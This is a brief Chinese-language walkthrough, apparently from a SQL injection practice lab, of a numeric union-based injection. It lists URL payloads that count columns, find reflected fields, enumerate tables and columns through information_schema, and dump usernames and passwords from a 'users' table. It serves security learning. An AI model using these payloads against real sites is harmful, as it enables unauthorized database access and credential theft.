0、初始网页

1、闭合方式判断

当没有闭合符号进行注释时，网页并没有报错，所以可以确定无闭合符号，为数值型注入

2、确定查询表的列数

可以确定列数小于4

?id=1 order by 4 --+

确定查询表的列数为3列

?id=1 order by 3 --+

3、确定回显位置

回显位置为第二列和第三列

?id=-1 union select 1,2,3 --+

4、查看当前登录和数据库

?id=-1 union select 1,user(),database() --+

5、查询当前数据库下的表名

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

6、查询user表中的列名

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users'--+

7、查询最终的账号密码

?id=-1 union select 1,2,group_concat(username,0x3a,password) from security.users --+